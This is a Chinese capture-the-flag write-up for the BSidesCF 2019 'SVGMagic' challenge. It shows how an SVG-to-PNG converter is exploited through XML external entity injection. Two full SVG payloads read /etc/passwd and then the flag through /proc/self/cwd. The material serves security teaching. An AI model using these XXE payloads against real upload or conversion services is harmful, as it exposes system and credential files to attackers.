[BSidesCF 2019]SVGMagic

打开题目

给了提示,使用魔法将svg转换成png,搜索了一下svg

是一种XML标记语言,既然是XML,就可能存在XXE漏洞

构造一个XML外部实体注入(XXE)攻击,尝试一下

<!ENTITY file SYSTEM "file:///etc/passwd" > 定义一个外部实体 file任意文件读取,读取/etc/passwd用户配置文件

在SVG部分中,&file; 通过文本引用该实体,试图将文件的内容嵌入到SVG输出中。

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE note [

<!ENTITY file SYSTEM "file:///etc/passwd" >

]>

<svg height="300" width="300">

<text x="30" y="30">&file;</text>

</svg>

上传发现可以正常读取

然后构造读取flag

/proc 文件系统:它是一个虚拟文件系统,提供了运行时系统信息,如进程信息、内存状态、系统配置等。

/proc/self:它是指当前正在访问该路径的进程自身。无论哪个进程访问 /proc/self,它总是指向调用者进程的 /proc/[pid] 目录。

cwd:代表"current working directory"(当前工作目录)。当你访问 /proc/self/cwd/ 时,你实际上是在查看当前进程的工作目录。

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE note [

<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >

]>

<svg height="300" width="3000">

<text x="30" y="30">&file;</text>

</svg>

上传得到flag

相关推荐
这儿有一堆花1 天前
一次渗透测试的全过程:从扫描到提权
web安全·网络安全·web
风语者日志1 天前
CTFSHOW—WEB4
网络·安全·web安全·网络安全·ctf
Andya_net2 天前
网络安全 | 深入了解 X.509 证书及其应用
服务器·安全·web安全
Andya_net2 天前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
jieyu11193 天前
uploads-labs靶场通关(1)
web安全·文件上传漏洞·靶场通关
竹等寒3 天前
Linux-网络安全私房菜(二)
linux·服务器·web安全
white-persist3 天前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
渗透测试老鸟-九青3 天前
网络安全之揭秘APT Discord C2 以及如何取证
安全·web安全·网络安全学习路线
key063 天前
大模型在网络安全领域的应用与评测
网络·人工智能·web安全
数字供应链安全产品选型4 天前
国家级!悬镜安全入选两项“网络安全国家标准应用实践案例”
人工智能·安全·web安全